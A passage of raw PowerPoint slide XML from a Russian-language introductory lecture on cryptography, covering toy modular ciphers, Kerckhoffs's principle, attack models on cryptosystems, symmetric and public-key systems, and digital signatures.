                  <a:srgbClr val="850aff"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>F(x)</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="ru-RU" sz="2600" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="850aff"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en-US" sz="2600" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="850aff"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>=</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="ru-RU" sz="2600" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="850aff"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en-US" sz="2600" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="850aff"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>x</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en-US" sz="2600" spc="-1" strike="noStrike" baseline="30000">
                <a:solidFill>
                  <a:srgbClr val="850aff"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>a</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en-US" sz="2600" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="850aff"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t> (mod n)</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="2600" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="1" marL="689040" indent="-347760" defTabSz="449280">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="649"/>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600" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>Ключ: </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="ru-RU" sz="2600" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="850aff"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>пара </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en-US" sz="2600" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="850aff"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>(a, n)</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="2600" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>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Пример 3:</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="3000" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="1" marL="689040" indent="-347760" defTabSz="449280">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="649"/>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600" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>Шифр: </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en-US" sz="2600" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="850aff"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>F(x)=ax</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en-US" sz="2600" spc="-1" strike="noStrike" baseline="30000">
                <a:solidFill>
                  <a:srgbClr val="850aff"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>3</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en-US" sz="2600" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="850aff"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>+bx</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en-US" sz="2600" spc="-1" strike="noStrike" baseline="30000">
                <a:solidFill>
                  <a:srgbClr val="850aff"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>2</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en-US" sz="2600" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="850aff"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>+cx+d  (mod n)</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="2600" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="1" marL="689040" indent="-347760" defTabSz="449280">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="649"/>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600" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>Ключ: </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en-US" sz="2600" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="850aff"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>(a,b,c,d,n)</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="2600" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="459" name="Text Box 3"/>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CFF3BA46-34A4-437A-BE71-553BF6EAB255}"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0"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3900" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="330066"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>Основные принципы</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="3900" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="461" name="Text Box 2"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="1500120"/>
            <a:ext cx="8227440" cy="5069880"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="0">
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:style>
          <a:lnRef idx="0"/>
          <a:fillRef idx="0"/>
          <a:effectRef idx="0"/>
          <a:fontRef idx="minor"/>
        </p:style>
        <p:txBody>
          <a:bodyPr lIns="90000" rIns="90000" tIns="45000" bIns="45000" anchor="t">
            <a:noAutofit/>
          </a:bodyPr>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принцип Кирхгофа:</a:t>
            </a:r>
            <a:br>
              <a:rPr sz="3000"/>
            </a:br>
            <a:r>
              <a:rPr b="0" lang="ru-RU" sz="3000" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>секретность должна быть заключена не в алгоритме шифрования, а в используемом ключе!</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="3000" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>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сущность принципа: </a:t>
            </a:r>
            <a:br>
              <a:rPr sz="3000"/>
            </a:br>
            <a:r>
              <a:rPr b="0" lang="ru-RU" sz="3000" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>чем меньше секретов содержит система, тем выше её безопасность</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="3000" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>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Пример: раскрыли один из секретов системы – и всю систему приходится выбросить</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="3000" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="462" name="Text Box 3"/>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CCFE2AEF-4581-41FA-9F3C-9533711495E6}"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9" name="Text Box 1"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="357120" y="214200"/>
            <a:ext cx="7141680" cy="1140840"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="0">
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:style>
          <a:lnRef idx="0"/>
          <a:fillRef idx="0"/>
          <a:effectRef idx="0"/>
          <a:fontRef idx="minor"/>
        </p:style>
        <p:txBody>
          <a:bodyPr lIns="90000" rIns="90000" tIns="45000" bIns="45000" anchor="b">
            <a:noAutofit/>
          </a:bodyPr>
          <a:p>
            <a:pPr defTabSz="449280">
              <a:lnSpc>
                <a:spcPct val="95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3900" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="330066"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>Понятие сетевой безопасности. Пример</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="3900" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="290" name="Text Box 2"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="685800" y="1981080"/>
            <a:ext cx="7770240" cy="2874240"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="0">
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:style>
          <a:lnRef idx="0"/>
          <a:fillRef idx="0"/>
          <a:effectRef idx="0"/>
          <a:fontRef idx="minor"/>
        </p:style>
        <p:txBody>
          <a:bodyPr lIns="90000" rIns="90000" tIns="45000" bIns="45000" anchor="t">
            <a:noAutofit/>
          </a:bodyPr>
          <a:p>
            <a:pPr marL="339840" indent="-339840" defTabSz="449280">
              <a:lnSpc>
                <a:spcPct val="95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on-line банкинг</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="3000" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="1" marL="689040" indent="-347760" defTabSz="449280">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="649"/>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600" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>осуществлять операции со счетом и не бояться, что кто-то украдет логин/пароль, информацию о счете</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="2600" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="1" marL="689040" indent="-347760" defTabSz="449280">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="649"/>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600" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>банк должен быть уверен, что операции совершает именно владелец карточки</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="2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3"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3900" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="330066"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>Атаки на криптосистемы</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="3900" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="464" name="Text Box 2"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="1500120"/>
            <a:ext cx="8227440" cy="4784040"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="0">
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:style>
          <a:lnRef idx="0"/>
          <a:fillRef idx="0"/>
          <a:effectRef idx="0"/>
          <a:fontRef idx="minor"/>
        </p:style>
        <p:txBody>
          <a:bodyPr lIns="90000" rIns="90000" tIns="45000" bIns="45000" anchor="t">
            <a:noAutofit/>
          </a:bodyPr>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шпион перехватил только зашифрованный текст</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="3000" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="1" marL="689040" indent="-347760" defTabSz="449280">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="649"/>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600" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>для взлома используется «грубая сила» - подбор</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="2600" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="1" marL="689040" indent="-34776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шпион вдобавок узнал зашифрованный и соответствующий ему расшифрованный текст (для шифра </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en-US" sz="2600" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="850aff"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>F(x)=x+k</a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" lang="ru-RU" sz="2600" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" lang="ru-RU" sz="3000" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>это катастрофа)</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="3000" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>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шпиону еще известен и алгоритм зашифровки (с ключом зашифровки)</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="3000" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="341280" indent="-339840" defTabSz="449280">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="751"/>
              </a:spcBef>
              <a:tabLst>
                <a:tab algn="l" pos="0"/>
              </a:tabLst>
            </a:pPr>
            <a:endParaRPr b="0" lang="en-US" sz="3000" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="465" name="Text Box 3"/>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6D234538-E32F-45C9-90C6-CF01AE0FB140}"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6"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3900" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="330066"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>Процесс шифрования-дешифрации</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="3900" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="467" name="Picture 2" descr=""/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId1"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="98280" y="2071800"/>
            <a:ext cx="8925840" cy="3712680"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="0">
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="468" name="Text Box 3"/>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2A0F18E3-5A2C-403E-8BA6-35FBE65886E1}"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9"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3900" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="330066"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>Виды криптосистем</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="3900" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="470" name="Text Box 2"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="1719360"/>
            <a:ext cx="8227440" cy="4409640"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="0">
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:style>
          <a:lnRef idx="0"/>
          <a:fillRef idx="0"/>
          <a:effectRef idx="0"/>
          <a:fontRef idx="minor"/>
        </p:style>
        <p:txBody>
          <a:bodyPr lIns="90000" rIns="90000" tIns="45000" bIns="45000" anchor="t">
            <a:noAutofit/>
          </a:bodyPr>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u="sng">
                <a:solidFill>
                  <a:srgbClr val="c00000"/>
                </a:solidFill>
                <a:uFillTx/>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>симметричные:</a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" lang="ru-RU" sz="3000" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t> ключ для расшифровки равен (или легко получается) из ключа зашифровки. Быстрые</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="3000" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="1" marL="689040" indent="-347760" defTabSz="449280">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="649"/>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600" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>Проблема: как передать по сети такой ключ?</a:t>
            </a:r>
            <a:br>
              <a:rPr sz="2600"/>
            </a:br>
            <a:r>
              <a:rPr b="0" lang="ru-RU" sz="2600" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="2600" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>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u="sng">
                <a:solidFill>
                  <a:srgbClr val="c00000"/>
                </a:solidFill>
                <a:uFillTx/>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>асимметричные:</a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" lang="ru-RU" sz="3000" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t> ключ зашифровки «публикуется в газете», ключ расшифровки храниться в тайне и известен только одной стороне. Медленные</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="3000" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="471" name="Text Box 3"/>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77A3A16C-26EE-44EC-9EA5-367C6E24922C}"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2"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3900" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="330066"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>Криптосистема </a:t>
            </a:r>
            <a:br>
              <a:rPr sz="3900"/>
            </a:br>
            <a:r>
              <a:rPr b="1" lang="ru-RU" sz="3900" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="330066"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>с открытым ключом</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="3900" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="473" name="Picture 2" descr=""/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId1"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="30240" y="1714680"/>
            <a:ext cx="9040320" cy="4569840"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="0">
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="474" name="Text Box 3"/>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C10FF8ED-5467-4F79-A98E-88516F72A323}"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5"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3900" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="330066"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>Электронно-цифровая подпись</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="3900" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="476" name="Text Box 2"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="1500120"/>
            <a:ext cx="8227440" cy="5069880"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="0">
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:style>
          <a:lnRef idx="0"/>
          <a:fillRef idx="0"/>
          <a:effectRef idx="0"/>
          <a:fontRef idx="minor"/>
        </p:style>
        <p:txBody>
          <a:bodyPr lIns="90000" rIns="90000" tIns="45000" bIns="45000" anchor="t">
            <a:noAutofit/>
          </a:bodyPr>
          <a:p>
            <a:pPr marL="339840" indent="-339840" defTabSz="449280">
              <a:lnSpc>
                <a:spcPct val="9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Проблема асимметричных криптосистем – </a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" lang="ru-RU" sz="3000" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="0070c0"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>зашифровать сообщение и отправить его от чужого имени может любой</a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" lang="ru-RU" sz="3000" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t> смышлёный злоумышленник</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="3000" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="339840" indent="-339840" defTabSz="449280">
              <a:lnSpc>
                <a:spcPct val="9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Выход – </a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" lang="ru-RU" sz="3000" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="0070c0"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>поставить подпись</a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" lang="ru-RU" sz="3000" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>: хеш от зашифрованного/исходного сообщения шифруется известным только отправителю ключом ЭЦП и посылается вместе с сообщением</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="3000" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="339840" indent="-339840" defTabSz="449280">
              <a:lnSpc>
                <a:spcPct val="9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70c0"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>Ключ расшифровки ЭЦП «печатается в газете»</a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" lang="ru-RU" sz="3000" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>, чтобы все знали подпись отправителя!</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="3000" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="477" name="Text Box 3"/>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4C2F26A3-D542-4E5E-9410-0CE94CF61FCE}"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8"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3900" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="330066"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>ЭЦП</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="3900" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="479" name="Text Box 2"/>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45242191-D8FA-4F23-A8C0-328206B069B2}"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pic>
        <p:nvPicPr>
          <p:cNvPr id="480" name="Picture 3" descr=""/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId1"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="1515960"/>
            <a:ext cx="9141840" cy="4719240"/>
